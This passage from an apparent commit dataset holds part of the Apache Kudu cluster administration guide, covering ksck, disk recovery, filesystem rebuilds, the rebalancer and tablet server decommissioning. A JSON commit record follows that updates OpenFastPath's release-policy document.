spread existing tablet replicas to the newly added\ntablet servers.\n4. After the rebalancer tool has completed, or even during its execution,\nyou can check on the health of the cluster using the `ksck` command-line utility\n(see <<ksck>> for more details).\n\n[[ksck]]\n=== Checking Cluster Health with `ksck`\n\nThe `kudu` CLI includes a tool named `ksck` that can be used for gathering\ninformation about the state of a Kudu cluster, including checking its health.\n`ksck` will identify issues such as under-replicated tablets, unreachable\ntablet servers, or tablets without a leader.\n\n`ksck` should be run from the command line as the Kudu admin user, and requires\nthe full list of master addresses to be specified:\n\n[source,bash]\n----\n$ sudo -u kudu kudu cluster ksck master-01.example.com,master-02.example.com,master-03.example.com\n----\n\nTo see a full list of the options available with `ksck`, use the `--help` flag.\nIf the cluster is healthy, `ksck` will print information about the cluster, a\nsuccess message, and return a zero (success) exit status.\n\n----\nMaster Summary\n UUID | Address | Status\n----------------------------------+-----------------------+---------\n a811c07b99394df799e6650e7310f282 | master-01.example.com | HEALTHY\n b579355eeeea446e998606bcb7e87844 | master-02.example.com | HEALTHY\n cfdcc8592711485fad32ec4eea4fbfcd | master-02.example.com | HEALTHY\n\nTablet Server Summary\n UUID | Address | Status\n----------------------------------+------------------------+---------\n a598f75345834133a39c6e51163245db | tserver-01.example.com | HEALTHY\n e05ca6b6573b4e1f9a518157c0c0c637 | tserver-02.example.com | HEALTHY\n e7e53a91fe704296b3a59ad304e7444a | tserver-03.example.com | HEALTHY\n\nVersion Summary\n Version | Servers\n---------+-------------------------\n 1.7.1 | all 6 server(s) checked\n\nSummary by table\n Name | RF | Status | Total Tablets | Healthy | Recovering | Under-replicated | Unavailable\n----------+----+---------+---------------+---------+------------+------------------+-------------\n my_table | 3 | HEALTHY | 8 | 8 | 0 | 0 | 0\n\n | Total Count\n----------------+-------------\n Masters | 3\n Tablet Servers | 3\n Tables | 1\n Tablets | 8\n Replicas | 24\nOK\n----\n\nIf the cluster is unhealthy, for instance if a tablet server process has\nstopped, `ksck` will report the issue(s) and return a non-zero exit status, as\nshown in the abbreviated snippet of `ksck` output below:\n\n----\nTablet Server Summary\n UUID | Address | Status\n----------------------------------+------------------------+-------------\n a598f75345834133a39c6e51163245db | tserver-01.example.com | HEALTHY\n e05ca6b6573b4e1f9a518157c0c0c637 | tserver-02.example.com | HEALTHY\n e7e53a91fe704296b3a59ad304e7444a | tserver-03.example.com | UNAVAILABLE\nError from 127.0.0.1:7150: Network error: could not get status from server: Client connection negotiation failed: client connection to 127.0.0.1:7150: connect: Connection refused (error 61) (UNAVAILABLE)\n\n... (full output elided)\n\n==================\nErrors:\n==================\nNetwork error: error fetching info from tablet servers: failed to gather info for all tablet servers: 1 of 3 had errors\nCorruption: table consistency check error: 1 out of 1 table(s) are not healthy\n\nFAILED\nRuntime error: ksck discovered errors\n----\n\nTo verify data integrity, the optional `--checksum_scan` flag can be set, which\nwill ensure the cluster has consistent data by scanning each tablet replica and\ncomparing results. The `--tables` or `--tablets` flags can be used to limit the\nscope of the checksum scan to specific tables or tablets, respectively. For\nexample, checking data integrity on the `my_table` table can be done with the\nfollowing command:\n\n[source,bash]\n----\n$ sudo -u kudu kudu cluster ksck --checksum_scan --tables my_table master-01.example.com,master-02.example.com,master-03.example.com\n----\n\nBy default, `ksck` will attempt to use a snapshot scan of the table, so the\nchecksum scan can be done while writes continue.\n\nFinally, `ksck` also supports output in JSON format using the `--ksck_format`\nflag. JSON output contains the same information as the plain text output, but\nin a format that can be used by other tools. See `kudu cluster ksck --help` for\nmore information.\n\n[[change_dir_config]]\n=== Changing Directory Configurations\n\nFor higher read parallelism and larger volumes of storage per server, users may\nwant to configure servers to store data in multiple directories on different\ndevices. Once a server is started, users must go through the following steps\nto change the directory configuration.\n\nUsers can add or remove data directories to an existing master or tablet server\nvia the `kudu fs update_dirs` tool. Data is striped across data directories,\nand when a new data directory is added, new data will be striped across the\nunion of the old and new directories.\n\nNOTE: Unless the `--force` flag is specified, Kudu will not allow for the\nremoval of a directory across which tablets are configured to spread data. If\n`--force` is specified, all tablets configured to use that directory will fail\nupon starting up and be replicated elsewhere.\n\nNOTE: If the link:configuration.html#directory_configuration[metadata\ndirectory] overlaps with a data directory, as was the default prior to Kudu\n1.7, or if a non-default metadata directory is configured, the\n`--fs_metadata_dir` configuration must be specified when running the `kudu fs\nupdate_dirs` tool.\n\nNOTE: Only new tablet replicas (i.e. brand new tablets' replicas and replicas\nthat are copied to the server for high availability) will use the new\ndirectory. Existing tablet replicas on the server will not be rebalanced across\nthe new directory.\n\nWARNING: All of the command line steps below should be executed as the Kudu\nUNIX user, typically `kudu`.\n\n. The tool can only run while the server is offline, so establish a maintenance\n window to update the server. The tool itself runs quickly, so this offline\n window should be brief, and as such, only the server to update needs to be\n offline. However, if the server is offline for too long (see the\n `follower_unavailable_considered_failed_sec` flag), the tablet replicas on it\n may be evicted from their Raft groups. To avoid this, it may be desirable to\n bring the entire cluster offline while performing the update.\n\n. Run the tool with the desired directory configuration flags. For example, if a\n cluster was set up with `--fs_wal_dir=\/wals`, `--fs_metadata_dir=\/meta`, and\n `--fs_data_dirs=\/data\/1,\/data\/2,\/data\/3`, and `\/data\/3` is to be removed (e.g.\n due to a disk error), run the command:\n\n+\n[source,bash]\n----\n$ sudo -u kudu kudu fs update_dirs --force --fs_wal_dir=\/wals --fs_metadata_dir=\/meta --fs_data_dirs=\/data\/1,\/data\/2\n----\n+\n\n. Modify the values of the `fs_data_dirs` flags for the updated sever. If using\n CM, make sure to only update the configurations of the updated server, rather\n than of the entire Kudu service.\n\n. Once complete, the server process can be started. When Kudu is installed using\n system packages, `service` is typically used:\n\n+\n[source,bash]\n----\n$ sudo service kudu-tserver start\n----\n+\n\n\n[[disk_failure_recovery]]\n=== Recovering from Disk Failure\nKudu nodes can only survive failures of disks on which certain Kudu directories\nare mounted. For more information about the different Kudu directory types, see\nthe section on link:configuration.html#directory_configuration[Kudu Directory\nConfigurations]. Below describes this behavior across different Apache Kudu\nreleases.\n\n[[disk_failure_behavior]]\n.Kudu Disk Failure Behavior\n[cols=\"<,<,<\",options=\"header\"]\n|===\n| Node Type | Kudu Directory Type | Kudu Releases that Crash on Disk Failure\n| Master | All | All\n| Tablet Server | Directory containing WALs | All\n| Tablet Server | Directory containing tablet metadata | All\n| Tablet Server | Directory containing data blocks only | Pre-1.6.0\n|===\n\nWhen a disk failure occurs that does not lead to a crash, Kudu will stop using\nthe affected directory, shut down tablets with blocks on the affected\ndirectories, and automatically re-replicate the affected tablets to other\ntablet servers. The affected server will remain alive and print messages to the\nlog indicating the disk failure, for example:\n\n----\nE1205 19:06:24.163748 27115 data_dirs.cc:1011] Directory \/data\/8\/kudu\/data marked as failed\nE1205 19:06:30.324795 27064 log_block_manager.cc:1822] Not using report from \/data\/8\/kudu\/data: IO error: Could not open container 0a6283cab82d4e75848f49772d2638fe: \/data\/8\/kudu\/data\/0a6283cab82d4e75848f49772d2638fe.metadata: Read-only file system (error 30)\nE1205 19:06:33.564638 27220 ts_tablet_manager.cc:946] T 4957808439314e0d97795c1394348d80 P 70f7ee61ead54b1885d819f354eb3405: aborting tablet bootstrap: tablet has data in a failed directory\n----\n\nWhile in this state, the affected node will avoid using the failed disk,\nleading to lower storage volume and reduced read parallelism. The administrator\nshould schedule a brief window to <<change_dir_config,update the node's\ndirectory configuration>> to exclude the failed disk.\n\nWhen the disk is repaired, remounted, and ready to be reused by Kudu, take the\nfollowing steps:\n\n. Make sure that the Kudu portion of the disk is completely empty.\n. Stop the tablet server.\n. Run the `update_dirs` tool. For example, to add `\/data\/3`, run the following:\n+\n[source,bash]\n----\n$ sudo -u kudu kudu fs update_dirs --force --fs_wal_dir=\/wals --fs_data_dirs=\/data\/1,\/data\/2,\/data\/3\n----\n+\n\n. Start the tablet server.\n. Run `ksck` to verify cluster health.\n+\n[source,bash]\n----\nsudo -u kudu kudu cluster ksck master-01.example.com\n----\n+\n\n\nNote that existing tablets will not stripe to the restored disk, but any new tablets\nwill stripe to the restored disk.\n\n[[disk_full_recovery]]\n=== Recovering from Full Disks\nBy default, Kudu reserves a small amount of space (1% by capacity) in its\ndirectories; Kudu considers a disk full if there is less free space available\nthan the reservation. Kudu nodes can only tolerate running out of space on disks\non which certain Kudu directories are mounted. For more information about the\ndifferent Kudu directory types, see\nlink:configuration.html#directory_configuration[Kudu Directory Configurations].\nThe table below describes this behavior for each type of directory. The behavior\nis uniform across masters and tablet servers.\n[[disk_full_behavior]]\n.Kudu Full Disk Behavior\n[options=\"header\"]\n|===\n| Kudu Directory Type | Crash on a Full Disk?\n| Directory containing WALs | Yes\n| Directory containing tablet metadata | Yes\n| Directory containing data blocks only | No (see below)\n|===\n\nPrior to Kudu 1.7.0, Kudu stripes tablet data across all directories, and will\navoid writing data to full directories. Kudu will crash if all data directories\nare full.\n\nIn 1.7.0 and later, new tablets are assigned a disk group consisting of\n-fs_target_data_dirs_per_tablet data dirs (default 3). If Kudu is not configured\nwith enough data directories for a full disk group, all data directories are\nused. When a data directory is full, Kudu will stop writing new data to it and\neach tablet that uses that data directory will write new data to other data\ndirectories within its group. If all data directories for a tablet are full, Kudu\nwill crash. Periodically, Kudu will check if full data directories are still\nfull, and will resume writing to those data directories if space has become\navailable.\n\nIf Kudu does crash because its data directories are full, freeing space on the\nfull directories will allow the affected daemon to restart and resume writing.\nNote that it may be possible for Kudu to free some space by running\n\n[source,bash]\n----\n$ sudo -u kudu kudu fs check --repair\n----\n\nbut this command may also fail if there is too little space left.\n\nIt's also possible to allocate additional data directories to Kudu in order to\nincrease the overall amount of storage available. See the documentation on\n<<change_dir_config,updating a node's directory configuration>> for more\ninformation. Note that existing tablets will not use new data directories, so\nadding a new data directory does not resolve issues with full disks.\n\n[[tablet_majority_down_recovery]]\n=== Bringing a tablet that has lost a majority of replicas back online\n\nIf a tablet has permanently lost a majority of its replicas, it cannot recover\nautomatically and operator intervention is required. If the tablet servers\nhosting a majority of the replicas are down (i.e. ones reported as \"TS\nunavailable\" by ksck), they should be recovered instead if possible.\n\nWARNING: The steps below may cause recent edits to the tablet to be lost,\npotentially resulting in permanent data loss. Only attempt the procedure below\nif it is impossible to bring a majority back online.\n\nSuppose a tablet has lost a majority of its replicas. The first step in\ndiagnosing and fixing the problem is to examine the tablet's state using ksck:\n\n[source,bash]\n----\n$ sudo -u kudu kudu cluster ksck --tablets=e822cab6c0584bc0858219d1539a17e6 master-00,master-01,master-02\nConnected to the Master\nFetched info from all 5 Tablet Servers\nTablet e822cab6c0584bc0858219d1539a17e6 of table 'my_table' is unavailable: 2 replica(s) not RUNNING\n 638a20403e3e4ae3b55d4d07d920e6de (tserver-00:7150): RUNNING\n 9a56fa85a38a4edc99c6229cba68aeaa (tserver-01:7150): bad state\n State: FAILED\n Data state: TABLET_DATA_READY\n Last status: <failure message>\n c311fef7708a4cf9bb11a3e4cbcaab8c (tserver-02:7150): bad state\n State: FAILED\n Data state: TABLET_DATA_READY\n Last status: <failure message>\n----\n\nThis output shows that, for tablet `e822cab6c0584bc0858219d1539a17e6`, the two\ntablet replicas on `tserver-01` and `tserver-02` failed. The remaining replica\nis not the leader, so the leader replica failed as well. This means the chance\nof data loss is higher since the remaining replica on `tserver-00` may have\nbeen lagging. In general, to accept the potential data loss and restore the\ntablet from the remaining replicas, divide the tablet replicas into two groups:\n\n1. Healthy replicas: Those in `RUNNING` state as reported by ksck\n2. Unhealthy replicas\n\nFor example, in the above ksck output, the replica on tablet server `tserver-00`\nis healthy, while the replicas on `tserver-01` and `tserver-02` are unhealthy.\nOn each tablet server with a healthy replica, alter the consensus configuration\nto remove unhealthy replicas. In the typical case of 1 out of 3 surviving\nreplicas, there will be only one healthy replica, so the consensus configuration\nwill be rewritten to include only the healthy replica.\n\n[source,bash]\n----\n$ sudo -u kudu kudu remote_replica unsafe_change_config tserver-00:7150 <tablet-id> <tserver-00-uuid>\n----\n\nwhere `<tablet-id>` is `e822cab6c0584bc0858219d1539a17e6` and\n`<tserver-00-uuid>` is the uuid of `tserver-00`,\n`638a20403e3e4ae3b55d4d07d920e6de`.\n\nOnce the healthy replicas' consensus configurations have been forced to exclude\nthe unhealthy replicas, the healthy replicas will be able to elect a leader.\nThe tablet will become available for writes, though it will still be\nunder-replicated. Shortly after the tablet becomes available, the leader master\nwill notice that it is under-replicated, and will cause the tablet to\nre-replicate until the proper replication factor is restored. The unhealthy\nreplicas will be tombstoned by the master, causing their remaining data to be\ndeleted.\n\n[[rebuilding_kudu]]\n=== Rebuilding a Kudu Filesystem Layout\n\nIn the event that critical files are lost, i.e. WALs or tablet-specific\nmetadata, all Kudu directories on the server must be deleted and rebuilt to\nensure correctness. Doing so will destroy the copy of the data for each tablet\nreplica hosted on the local server. Kudu will automatically re-replicate tablet\nreplicas removed in this way, provided the replication factor is at least three\nand all other servers are online and healthy.\n\nNOTE: These steps use a tablet server as an example, but the steps are the same\nfor Kudu master servers.\n\nWARNING: If multiple nodes need their FS layouts rebuilt, wait until all\nreplicas previously hosted on each node have finished automatically\nre-replicating elsewhere before continuing. Failure to do so can result in\npermanent data loss.\n\nWARNING: Before proceeding, ensure the contents of the directories are backed\nup, either as a copy or in the form of other tablet replicas.\n\n. The first step to rebuilding a server with a new directory configuration is\n emptying all of the server's existing directories. For example, if a tablet\n server is configured with `--fs_wal_dir=\/data\/0\/kudu-tserver-wal`,\n `--fs_metadata_dir=\/data\/0\/kudu-tserver-meta`, and\n `--fs_data_dirs=\/data\/1\/kudu-tserver,\/data\/2\/kudu-tserver`, the following\n commands will remove the WAL directory's and data directories' contents:\n\n+\n[source,bash]\n----\n# Note: this will delete all of the data from the local tablet server.\n$ rm -rf \/data\/0\/kudu-tserver-wal\/* \/data\/0\/kudu-tserver-meta\/* \/data\/1\/kudu-tserver\/* \/data\/2\/kudu-tserver\/*\n----\n+\n\n. If using CM, update the configurations for the rebuilt server to include only\n the desired directories. Make sure to only update the configurations of servers\n to which changes were applied, rather than of the entire Kudu service.\n\n. After directories are deleted, the server process can be started with the new\n directory configuration. The appropriate sub-directories will be created by\n Kudu upon starting up.\n\n[[minimizing_cluster_disruption_during_temporary_single_ts_downtime]]\n=== Minimizing cluster disruption during temporary planned downtime of a single tablet server\n\nIf a single tablet server is brought down temporarily in a healthy cluster, all\ntablets will remain available and clients will function as normal, after\npotential short delays due to leader elections. However, if the downtime lasts\nfor more than `--follower_unavailable_considered_failed_sec` (default 300)\nseconds, the tablet replicas on the down tablet server will be replaced by new\nreplicas on available tablet servers. This will cause stress on the cluster\nas tablets re-replicate and, if the downtime lasts long enough, significant\nreduction in the number of replicas on the down tablet server. This may require\nthe rebalancer to fix.\n\nTo work around this, increase `--follower_unavailable_considered_failed_sec` on\nall tablet servers so the amount of time before re-replication will start is\nlonger than the expected downtime of the tablet server, including the time it\ntakes the tablet server to restart and bootstrap its tablet replicas. To do\nthis, run the following command for each tablet server:\n\n[source,bash]\n----\n$ sudo -u kudu kudu tserver set_flag <tserver_address> follower_unavailable_considered_failed_sec <num_seconds>\n----\n\nwhere `<num_seconds>` is the number of seconds that will encompass the downtime.\nOnce the downtime is finished, reset the flag to its original value.\n\n----\n$ sudo -u kudu kudu tserver set_flag <tserver_address> follower_unavailable_considered_failed_sec <original_value>\n----\n\nWARNING: Be sure to reset the value of `--follower_unavailable_considered_failed_sec`\nto its original value.\n\nNOTE: On Kudu versions prior to 1.8, the `--force` flag must be provided in the above\ncommands.\n\n[[rebalancer_tool]]\n=== Running the tablet rebalancing tool\n\nThe `kudu` CLI contains a rebalancing tool that can be used to rebalance\ntablet replicas among tablet servers. For each table, the tool attempts to\nbalance the number of replicas per tablet server. It will also, without\nunbalancing any table, attempt to even out the number of replicas per tablet\nserver across the cluster as a whole. The rebalancing tool should be run as the\nKudu admin user, specifying all master addresses:\n\n[source,bash]\n----\nsudo -u kudu kudu cluster rebalance master-01.example.com,master-02.example.com,master-03.example.com\n----\n\nWhen run, the rebalancer will report on the initial tablet replica distribution\nin the cluster, log the replicas it moves, and print a final summary of the\ndistribution when it terminates:\n\n----\nPer-server replica distribution summary:\n Statistic | Value\n-----------------------+-----------\n Minimum Replica Count | 0\n Maximum Replica Count | 24\n Average Replica Count | 14.400000\n\nPer-table replica distribution summary:\n Replica Skew | Value\n--------------+----------\n Minimum | 8\n Maximum | 8\n Average | 8.000000\n\nI0613 14:18:49.905897 3002065792 rebalancer.cc:779] tablet e7ee9ade95b342a7a94649b7862b345d: 206a51de1486402bbb214b5ce97a633c -> 3b4d9266ac8c45ff9a5d4d7c3e1cb326 move scheduled\nI0613 14:18:49.917578 3002065792 rebalancer.cc:779] tablet 5f03944529f44626a0d6ec8b1edc566e: 6e64c4165b864cbab0e67ccd82091d60 -> ba8c22ab030346b4baa289d6d11d0809 move scheduled\nI0613 14:18:49.928683 3002065792 rebalancer.cc:779] tablet 9373fee3bfe74cec9054737371a3b15d: fab382adf72c480984c6cc868fdd5f0e -> 3b4d9266ac8c45ff9a5d4d7c3e1cb326 move scheduled\n\n... (full output elided)\n\nI0613 14:19:01.162802 3002065792 rebalancer.cc:842] tablet f4c046f18b174cc2974c65ac0bf52767: 206a51de1486402bbb214b5ce97a633c -> 3b4d9266ac8c45ff9a5d4d7c3e1cb326 move completed: OK\n\nrebalancing is complete: cluster is balanced (moved 28 replicas)\nPer-server replica distribution summary:\n Statistic | Value\n-----------------------+-----------\n Minimum Replica Count | 14\n Maximum Replica Count | 15\n Average Replica Count | 14.400000\n\nPer-table replica distribution summary:\n Replica Skew | Value\n--------------+----------\n Minimum | 1\n Maximum | 1\n Average | 1.000000\n----\n\nIf more details are needed in addition to the replica distribution summary,\nuse the `--output_replica_distribution_details` flag. If added, the flag makes\nthe tool print per-table and per-tablet server replica distribution statistics\nas well.\n\nUse the `--report_only` flag to get a report on table- and cluster-wide\nreplica distribution statistics without starting any rebalancing activity.\n\nThe rebalancer can also be restricted to run on a subset of the tables by\nsupplying the `--tables` flag. Note that, when running on a subset of tables,\nthe tool will not attempt to balance the cluster as a whole.\n\nThe length of time rebalancing is run for can be controlled with the flag\n`--max_run_time_sec`. By default, the rebalancer will run until the cluster is\nbalanced. To control the amount of resources devoted to rebalancing, modify\nthe flag `--max_moves_per_server`. See `kudu cluster rebalance --help` for more.\n\nIt's safe to stop the rebalancer tool at any time. When restarted, the\nrebalancer will continue rebalancing the cluster.\n\nThe rebalancer requires all registered tablet servers to be up and running\nto proceed with the rebalancing process. That's to avoid possible conflicts\nand races with the automatic re-replication and keep replica placement optimal\nfor current configuration of the cluster. If a tablet server becomes\nunavailable during the rebalancing session, the rebalancer will exit. As noted\nabove, it's safe to restart the rebalancer after resolving the issue with\nunavailable tablet servers.\n\nThe rebalancing tool can rebalance Kudu clusters running older versions as well,\nwith some restrictions. Consult the following table for more information. In the\ntable, \"RF\" stands for \"replication factor\".\n\n[[rebalancer_compatibility]]\n.Kudu Rebalancing Tool Compatibility\n[options=\"header\"]\n|===\n| Version Range | Rebalances RF = 1 Tables? | Rebalances RF > 1 Tables?\n| v < 1.4.0 | No | No\n| 1.4.0 +<=+ v < 1.7.1 | No | Yes\n| v >= 1.7.1 | Yes | Yes\n|===\n\nIf the rebalancer is running against a cluster where rebalancing replication\nfactor one tables is not supported, it will rebalance all the other tables\nand the cluster as if those singly-replicated tables did not exist.\n\n[[rebalancer_tool_with_rack_awareness]]\n=== Running the tablet rebalancing tool on a rack-aware cluster\n\nAs detailed in the <<rack_awareness, rack awareness>> section, it's possible\nto use the `kudu cluster rebalance` tool to establish the placement policy on a\ncluster. This might be necessary when the rack awareness feature is first\nconfigured or when re-replication violated the placement policy. The rebalancing\ntool breaks its work into three phases:\n\n. The rack-aware rebalancer tries to establish the placement policy. Use the\n `--disable_policy_fixer` flag to skip this phase.\n. The rebalancer tries to balance load by location, moving tablet replicas\n between locations in an attempt to spread tablet replicas among locations\n evenly. The load of a location is measured as the total number of replicas in\n the location divided by the number of tablet servers in the location. Use the\n `--disable_cross_location_rebalancing` flag to skip this phase.\n. The rebalancer tries to balance the tablet replica distribution within each\n location, as if the location were a cluster on its own. Use the\n `--disable_intra_location_rebalancing` flag to skip this phase.\n\nBy using the `--report_only` flag, it's also possible to check if all tablets in\nthe cluster conform to the placement policy without attempting any replica\nmovement.\n\n[[tablet_server_decommissioning]]\n=== Decommissioning or Permanently Removing a Tablet Server From a Cluster\n\nKudu does not currently have an automated way to remove a tablet server from\na cluster permanently. Instead, use the following steps:\n\n. Ensure the cluster is in good health using `ksck`. See <<ksck>>.\n. If the tablet server contains any replicas of tables with replication factor\n 1, these replicas must be manually moved off the tablet server prior to\n shutting it down. The `kudu tablet change_config move_replica` tool can be\n used for this.\n. Shut down the tablet server. After\n `-follower_unavailable_considered_failed_sec`, which defaults to 5 minutes,\n Kudu will begin to re-replicate the tablet server's replicas to other servers.\n Wait until the process is finished. Progress can be monitored using `ksck`.\n. Once all the copies are complete, `ksck` will continue to report the tablet\n server as unavailable. The cluster will otherwise operate fine without the\n tablet server. To completely remove it from the cluster so `ksck` shows the\n cluster as completely healthy, restart the masters. In the case of a single\n master, this will cause cluster downtime. With multi-master, restart the\n masters in sequence to avoid cluster downtime.\n\nWARNING: Do not shut down multiple tablet servers at once. To remove multiple\ntablet servers from the cluster, follow the above instructions for each tablet\nserver, ensuring that the previous tablet server is removed from the cluster and\n`ksck` is healthy before shutting down the next.\n\n[[using_cluster_names_in_kudu_tool]]\n=== Using cluster names in the `kudu` command line tool\n\nWhen using the `kudu` command line tool, it can be difficult to remember the\nprecise list of Kudu master RPC addresses needed to communicate with a cluster,\nespecially when managing multiple clusters. As an alternative, the command line\ntool can identify clusters by name. To use this functionality:\n\n. Create a new directory to store the Kudu configuration file.\n. Export the path to this directory in the `KUDU_CONFIG` environment variable.\n. Create a file called `kudurc` in the new directory.\n. Populate `kudurc` as follows, substituting your own cluster names and RPC\n addresses:\n+\n----\nclusters_info:\n cluster_name1:\n master_addresses: ip1:port1,ip2:port2,ip3:port3\n cluster_name2:\n master_addresses: ip4:port4\n----\n+\n. When using the `kudu` command line tool, replace the list of Kudu master RPC\n addresses with the cluster name, prepended with the character `@`.\n\n Example::\n+\n----\n$ sudo -u kudu kudu ksck @cluster_name1\n----\n+\n\n\nNOTE: Cluster names may be used as input in any invocation of the `kudu` command\nline tool that expects a list of Kudu master RPC addresses.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0b4703b9ad2d53358c96597e4cd1cb2cc963667b","subject":"docs: Specify that OFP should adapt to ODP LTS releases.","message":"docs: Specify that OFP should adapt to ODP LTS releases.\n\nODP Long Term Support (LTS) releases are the ones that are actually\nsupported by ODP and vendors alike, so those are the ODP releases OFP\nshould adapt to.\n\nSigned-off-by: Jere Lepp\u00e4nen <14957520de8d9815e0c353a07fe23c737f0171e9@nokia.com>\nReviewed-by: Sorin Vultureanu <8013ba55f8675034bc2ab0d6c3a1c9650437ca36@enea.com>\n","repos":"TolikH\/ofp,OpenFastPath\/ofp,TolikH\/ofp,OpenFastPath\/ofp,OpenFastPath\/ofp,TolikH\/ofp,OpenFastPath\/ofp","old_file":"docs\/release-policy.adoc","new_file":"docs\/release-policy.adoc","new_contents":"= OpenFastPath Release Policy\nJere Lepp\u00e4nen <jere.leppanen@nokia.com>\n:max-width: 600px\n:numbered:\n:toc:\n\n\n\n== Introduction\n\nThis document defines the policies concerning OpenFastPath (OFP)\nsoftware releases. Written rules are required to produce uniform\nreleases. Publicly documented release policy and release process also\nbrings some predictability to the project, which is beneficial to both\nusers and contributors.\n\nThis document is informational, not binding. The policy may be changed\nat the decision of the OFP Technical Steering Committee (TSC).\n\nThe purpose of OFP releases is to provide supported software with a\nstable API and ABI to users. The API is defined by C header files in\nthe include\/api directory in the OFP repository <<repo>>.\n\n\n\n== Versioning and Naming\n\n* Semantic Versioning <<semver>> is used.\n\n* Versioning is driven by API, ABI and CLI.\n\n ** Any compatible change of API, ABI or CLI increments the minor\n version.\n\n ** Any incompatible change of API, ABI or CLI increments the major\n version.\n\n ** An incompatible CLI change means that a CLI command doesn't\n work anymore or does something different than it did before.\n\n* Every minor version is a release.\n\n* Releases are named after small animals, with the first letters of\n the names progressing in alphabetical order.\n\n* Bug fixes are gathered and tagged as a patch version, and published\n as a patch release.\n\n* Libraries are versioned independently from release versioning, and\n independently of each other, using Semantic Versioning driven by the\n ABI provided by the library.\n\n.Referring to a release or a version\n****\n. \"OpenFastPath\" or \"OFP\", without the quotes.\n. Release name, starting with a capital letter.\n. Version.\n\nSome elements may be omitted, but the remaining elements always appear\nin this order.\n\nExamples:\n\n* OpenFastPath Angelfish 2.0.0 - for maximum clarity.\n\n* OFP Angelfish - when the exact version doesn't matter, because\n they're all compatible anyway.\n\n* OFP 2.0.0 - when you don't care about the naming.\n\n* Angelfish 2.0.0 - when referring to a release, but at the same time\n wanting to specify the exact version for those individuals in the\n audience for whom it means something.\n****\n\n\n\n== Compatibility\n\nIt follows from the versioning scheme that within a release, API, ABI\nand CLI are backwards compatible. Beyond that, version numbers are\nneeded to determine whether two releases are compatible or not.\n\nEach library is separately versioned, so it's possible for a\nparticular library to be ABI compatible across different releases or\neven across different major versions.\n\n\n\n== Requirements\n\nRelease Notes lists the requirements for each OFP release, including\nthe required version of OpenDataPlane (ODP). Newer compatible\nversions of ODP may be used. In ODP's four level versioning, as long\nas the first two levels remain the same, the API is compatible. Please\nsee <<ODPRG>> for more information on ODP release versioning.\n\n\n\n== Support\n\nAll serious bugs in the current General Availability release are fixed\non a best-effort basis. Bug fixes are integrated in a patch release.\nThe example applications in the examples directory may have a lower\nsupport priority than the core implementation.\n\nNew features and improvements are usually added only in new releases,\nalthough it's possible to add new features in a patch release as long\nas compatibility is preserved.\n\n\n\n== Release Contents\n\nAn OFP release consists of the following source code and documentation:\n\n* Release Announcement on the OFP announcements page and on the\n mailing list, which states the name, version and date of the\n release, and contains a link to the Release Notes.\n\n* Release Notes, which includes information about requirements, the\n release life cycle, changes since last release and known\n issues. Release Notes are archived on the OFP Release Archive page\n <<relarch>>.\n\n* Release tag in the OFP repository <<repo>>, and all the content in\n the repository that the release tag points to.\n\n\n\n== Release Life Cycle\n\n* The stages of a release are:\n\n Development:: In this stage, new features are being developed and\n old features may be modified or even removed. The API, ABI and\n CLI may be unstable.\n\n Release Candidate:: Once all features have been implemented and\n API finalized, a feature freeze, which implies API, ABI and\n CLI freeze, may be initiated and the release moved to the\n release candidate stage. Release candidates are tagged. If\n issues are found, a correction is made and a new release\n candidate is tagged. Even though the API is frozen, bugs in\n the API may still be corrected in this stage. Once a release\n enters the Release Candidate stage, the next release enters\n Development stage.\n\n General Availability:: A release may enter this stage once the\n following criteria are met:\n\n *** All automated test cases pass.\n\n *** At least one week has passed since the last release\n candidate was tagged, and no issues requiring a correction\n have been found.\n\n *** All release content, listed in the\n <<_release_contents,Release Contents>> section, is\n available.\n\n End of Life:: A release enters End of Life stage once the next\n release enters General Availability stage. In the End of Life\n stage, no changes are made to the release and bug reports are\n not necessarily accepted anymore. Even if a bug report is\n accepted, the correction will only be done to the current\n release.\n\n* Only one release at a time is maintained (in General Availability\n stage).\n\n* General Availability stage lasts for at least five months.\n\n* OFP aims to adapt to new ODP Long Term Support (LTS) releases within\n one month of the ODP release. This usually necessitates a new OFP\n release.\n\n* Stage transitions are communicated on the announcements page and\n mailing list at least one week beforehand, End of Life at least one\n month beforehand.\n\n* The decisions and approvals related to transitions between these\n stages are the responsibility of the TSC, based on the criteria\n above and inputs and comments from OFP members.\n\n\n\n== References\n\n[bibliography]\n\n* [[[ODPRG]]] ODP Release Guide.\n http:\/\/docs.opendataplane.org\/snapshots\/odp-publish\/generic\/usr_html\/latest\/master\/linux-generic\/output\/release-guide.html\n\n* [[[relarch]]] OFP Release Archive.\n http:\/\/www.openfastpath.org\/index.php\/service\/releasearchives\/\n\n* [[[repo]]] OFP Repository. https:\/\/github.com\/OpenFastPath\/ofp\n\n* [[[semver]]] Semantic Versioning 2.0.0.\n http:\/\/semver.org\/spec\/v2.0.0.html\n","old_contents":"= OpenFastPath Release Policy\nJere Lepp\u00e4nen <jere.leppanen@nokia.com>\n:max-width: 600px\n:numbered:\n:toc:\n\n\n\n== Introduction\n\nThis document defines the policies concerning OpenFastPath (OFP)\nsoftware releases. Written rules are required to produce uniform\nreleases. Publicly documented release policy and release process also\nbrings some predictability to the project, which is beneficial to both\nusers and contributors.\n\nThis document is informational, not binding. The policy may be changed\nat the decision of the OFP Technical Steering Committee (TSC).\n\nThe purpose of OFP releases is to provide supported software with a\nstable API and ABI to users. The API is defined by C header files in\nthe include\/api directory in the OFP repository <<repo>>.\n\n\n\n== Versioning and Naming\n\n* Semantic Versioning <<semver>> is used.\n\n* Versioning is driven by API, ABI and CLI.\n\n ** Any compatible change of API, ABI or CLI increments the minor\n version.\n\n ** Any incompatible change of API, ABI or CLI increments the major\n version.\n\n ** An incompatible CLI change means that a CLI command doesn't\n work anymore or does something different than it did before.\n\n* Every minor version is a release.\n\n* Releases are named after small animals, with the first letters of\n the names progressing in alphabetical order.\n\n* Bug fixes are gathered and tagged as a patch version, and published\n as a patch release.\n\n* Libraries are versioned independently from release versioning, and\n independently of each other, using Semantic Versioning driven by the\n ABI provided by the library.\n\n.Referring to a release or a version\n****\n. \"OpenFastPath\" or \"OFP\", without the quotes.\n. Release name, starting with a capital letter.\n. Version.\n\nSome elements may be omitted, but the remaining elements always appear\nin this order.\n\nExamples:\n\n* OpenFastPath Angelfish 2.0.0 - for maximum clarity.\n\n* OFP Angelfish - when the exact version doesn't matter, because\n they're all compatible anyway.\n\n* OFP 2.0.0 - when you don't care about the naming.\n\n* Angelfish 2.0.0 - when referring to a release, but at the same time\n wanting to specify the exact version for those individuals in the\n audience for whom it means something.\n****\n\n\n\n== 